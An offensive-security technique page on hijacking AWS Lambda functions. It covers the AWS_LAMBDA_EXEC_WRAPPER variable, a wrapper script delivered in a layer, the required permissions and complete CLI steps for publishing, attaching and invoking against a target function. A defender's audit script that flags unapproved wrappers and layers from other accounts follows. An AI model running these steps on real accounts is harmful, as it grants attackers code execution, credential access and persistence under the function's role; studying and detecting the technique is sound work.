# AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)
## Summary

Abuse the environment variable `AWS_LAMBDA_EXEC_WRAPPER` to execute an attacker-controlled wrapper script before the runtime/handler starts. Deliver the wrapper via a Lambda Layer at `/opt/bin/htwrap`, set `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap`, and then invoke the function. The wrapper runs inside the function's runtime process, inherits the function's execution role, and finally `exec`s the real runtime so the original handler still runs normally.
> [!WARNING]
> This technique gives code execution in the target Lambda without modifying its source code or role and without needing `iam:PassRole`. You only need the ability to update the function configuration and publish/attach a layer.
## Required Permissions (attacker)

- `lambda:UpdateFunctionConfiguration`
- `lambda:GetFunctionConfiguration`
- `lambda:InvokeFunction` (or trigger via existing event)
- `lambda:ListFunctions`, `lambda:ListLayers`
- `lambda:PublishLayerVersion` (same account) and optionally `lambda:AddLayerVersionPermission` if using a cross-account/public layer
## Wrapper Script

Place the wrapper at `/opt/bin/htwrap` inside the layer. It can run pre-handler logic and must end with `exec "$@"` to chain to the real runtime.
```bash
#!/bin/bash
set -euo pipefail
# Pre-handler actions (runs in runtime process context)
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json, os
try:
    ident = boto3.client('sts').get_caller_identity()
    print('[ht] sts identity:', json.dumps(ident))
except Exception as e:
    print('[ht] sts error:', e)
PY
# Chain to the real runtime
exec "$@"
```
## Attack Steps (CLI)

<details>
<summary>Publish the layer, attach it to the target function, set the wrapper, invoke</summary>

```bash
# Vars
REGION=us-east-1
TARGET_FN="<target-function-name>"  # placeholder: the value is missing on the page

# 1) Package wrapper at /opt/bin/htwrap
mkdir -p layer/bin
cat > layer/bin/htwrap <<'WRAP'
#!/bin/bash
set -euo pipefail
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json
print('[ht] sts identity:', __import__('json').dumps(__import__('boto3').client('sts').get_caller_identity()))
PY
exec "$@"
WRAP
chmod +x layer/bin/htwrap
# Zip from inside layer/ so the file unpacks to /opt/bin/htwrap
(cd layer && zip -qr ../htwrap-layer.zip .)

# 2) Publish the layer
LAYER_ARN=$(aws lambda publish-layer-version \
  --layer-name ht-exec-wrapper \
  --zip-file fileb://htwrap-layer.zip \
  --compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8 \
  --query LayerVersionArn --output text --region "$REGION")
echo "$LAYER_ARN"

# 3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER
aws lambda update-function-configuration \
  --function-name "$TARGET_FN" \
  --layers "$LAYER_ARN" \
  --environment "Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}" \
  --region "$REGION"

# Wait for update to finish
until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --query LastUpdateStatus --output text --region "$REGION")" = "Successful" ]; do sleep 2; done

# 4) Invoke and verify via CloudWatch Logs
aws lambda invoke --function-name "$TARGET_FN" /tmp/out.json --region "$REGION" >/dev/null
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 50 --region "$REGION" --query 'events[].message' --output text
```

</details>
## Impact
- Pre-handler code execution in the Lambda runtime context using the function's existing execution role.
- No changes to the function code or role are required; it works across the common managed runtimes (Python, Node.js, Java, .NET).
- Enables persistence, credential access (e.g., STS), data exfiltration, and runtime tampering before the handler starts.
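
A defender's check for this technique, added here as an example and not part of the original page: it flags functions whose configuration sets `AWS_LAMBDA_EXEC_WRAPPER` to a path outside an allow-list and notes attached layers owned by another account. The allow-list entry, function names, account IDs and sample configurations are constructed; the dict shape follows the `Functions` entries returned by `aws lambda list-functions`.

```python
import json

WRAPPER_VAR = "AWS_LAMBDA_EXEC_WRAPPER"
# Hypothetical allow-list: wrapper paths your own tooling legitimately sets.
APPROVED = frozenset({"/opt/approved-telemetry-wrapper"})

def arn_account(arn):
    """Account-id field of an ARN: arn:partition:service:region:account:..."""
    parts = arn.split(":")
    return parts[4] if len(parts) > 5 else ""

def audit_function(cfg, approved=APPROVED):
    """Return a finding for a function whose exec wrapper is not approved."""
    env = (cfg.get("Environment") or {}).get("Variables") or {}
    wrapper = env.get(WRAPPER_VAR)
    if not wrapper or wrapper in approved:
        return None
    owner = arn_account(cfg["FunctionArn"])
    layers = [layer["Arn"] for layer in cfg.get("Layers") or []]
    return {
        "function": cfg["FunctionName"],
        "wrapper": wrapper,
        "from_layer": wrapper.startswith("/opt/"),  # layers unpack under /opt
        "layers": layers,
        "foreign_layers": [a for a in layers if arn_account(a) != owner],
    }

def audit(functions, approved=APPROVED):
    """Audit a list of function configurations and return all findings."""
    return [f for f in (audit_function(c, approved) for c in functions) if f]

def _fn(name, wrapper=None, layer_account=None):
    """Build a constructed config shaped like one list-functions entry."""
    cfg = {"FunctionName": name,
           "FunctionArn": f"arn:aws:lambda:us-east-1:111111111111:function:{name}"}
    if wrapper:
        cfg["Environment"] = {"Variables": {WRAPPER_VAR: wrapper}}
    if layer_account:
        cfg["Layers"] = [{"Arn": f"arn:aws:lambda:us-east-1:{layer_account}:layer:demo:1"}]
    return cfg

# Constructed sample data, not real output.
SAMPLE = [
    _fn("billing-report"),
    _fn("orders-api", "/opt/bin/htwrap", "111111111111"),
    _fn("image-resize", "/opt/approved-telemetry-wrapper", "111111111111"),
    _fn("export-job", "/opt/bin/htwrap", "222222222222"),
]

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE), indent=2))
```

To audit a real account, pass the `Functions` array from `aws lambda list-functions --output json` to `audit()`.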

